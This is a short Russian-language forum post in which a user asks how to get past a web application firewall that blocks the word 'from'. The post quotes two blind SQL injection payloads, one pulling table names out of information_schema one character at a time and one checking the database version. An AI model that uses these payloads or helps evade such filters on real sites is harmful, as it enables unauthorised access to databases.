Показать сообщение отдельно

  #8  
Старый 10.12.2016, 12:18
elvir
Новичок
Регистрация: 30.11.2016
Сообщений: 11
С нами: 4974806

Репутация: 0
По умолчанию

Как обойти WAF если фильтрует слово from при такой подстановки:

+and+ascii(substring((select+table_name+from+infor mation_schema.

tables+limit+1,1),1,1 ))>0--

а так всё нормально:

+and+substring(version(),1,1)=5--
 
Ответить с цитированием